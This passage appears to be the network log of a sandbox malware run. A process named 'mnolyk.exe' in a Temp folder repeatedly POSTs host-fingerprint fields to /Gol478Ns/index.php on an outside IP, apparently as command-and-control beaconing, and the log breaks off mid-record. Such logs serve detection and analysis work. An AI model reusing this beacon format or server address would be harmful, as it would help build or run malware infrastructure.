Feb 7, 2023 19:59:27.708693027 CET	748	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
504	192.168.2.5	50217	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:27.889672995 CET	749	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:27.954425097 CET	749	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
505	192.168.2.5	50218	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:28.144912004 CET	750	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:28.210578918 CET	750	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
506	192.168.2.5	50219	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:28.398283958 CET	751	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:28.463226080 CET	751	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
507	192.168.2.5	50220	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:28.638484001 CET	752	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:28.703393936 CET	752	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
508	192.168.2.5	50221	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:28.870563030 CET	753	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:28.932578087 CET	753	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
509	192.168.2.5	50222	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:29.105694056 CET	754	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:29.168239117 CET	754	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.5	49753	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:18.413042068 CET	187	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:18.477334023 CET	188	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
510	192.168.2.5	50223	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:29.342199087 CET	755	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:29.403978109 CET	755	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
511	192.168.2.5	50224	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:29.577696085 CET	756	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:29.642642975 CET	756	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
512	192.168.2.5	50225	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:29.829004049 CET	757	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:29.891496897 CET	757	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
513	192.168.2.5	50226	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:30.062963963 CET	758	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:30.128540039 CET	758	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
514	192.168.2.5	50227	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:30.297316074 CET	759	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:30.360502958 CET	759	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
515	192.168.2.5	50228	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:30.531227112 CET	760	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:30.596160889 CET	760	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
516	192.168.2.5	50229	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:30.761202097 CET	761	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:30.822582960 CET	761	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
517	192.168.2.5	50230	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:30.997466087 CET	762	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:31.061772108 CET	762	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
518	192.168.2.5	50231	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:31.231344938 CET	763	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:31.294409037 CET	763	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
519	192.168.2.5	50232	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:31.467525005 CET	764	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:31.537295103 CET	764	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.5	49754	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:18.680476904 CET	188	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:18.745625973 CET	189	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
520	192.168.2.5	50233	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:31.718708038 CET	765	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:31.783266068 CET	765	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
521	192.168.2.5	50234	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:31.956331968 CET	766	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:32.019738913 CET	766	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
522	192.168.2.5	50235	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:32.185122013 CET	767	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:32.251034021 CET	767	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
523	192.168.2.5	50236	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
